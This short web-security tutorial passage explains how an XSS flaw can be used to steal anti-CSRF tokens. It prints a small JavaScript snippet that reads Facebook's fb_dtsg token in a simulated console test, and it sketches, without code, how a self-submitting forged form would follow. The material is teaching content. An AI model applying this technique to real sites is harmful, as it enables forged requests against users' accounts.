Using XSS to steal anti-CSRF tokens
If we have an XSS vulnerability in the web application, then by inserting appropriate JavaScript code we can steal the token and then use that to build a CSRF exploit (a self-submitting form and so on).
In the following image I've simulated an XSS vulnerability in Facebook through the Developer Console of Chrome, inserted the following code, which will grab the CSRF token from the hidden input with the name fb_dtsg and display it in the browser as shown in the screenshot following the code:
var csrf = document.getElementsByTagName("input")['fb_dtsg'].value;
alert('Your CSRF protection token fb_dtsg has value '+csrf);Let's take a look at the following screenshot:
It seems plain and simple, right? Similarly, we can use the csrf variable from the JS code, inject it into a self-submitting form through DOM manipulations, and then make the form auto-submit itself. I will leave this as an exercise.
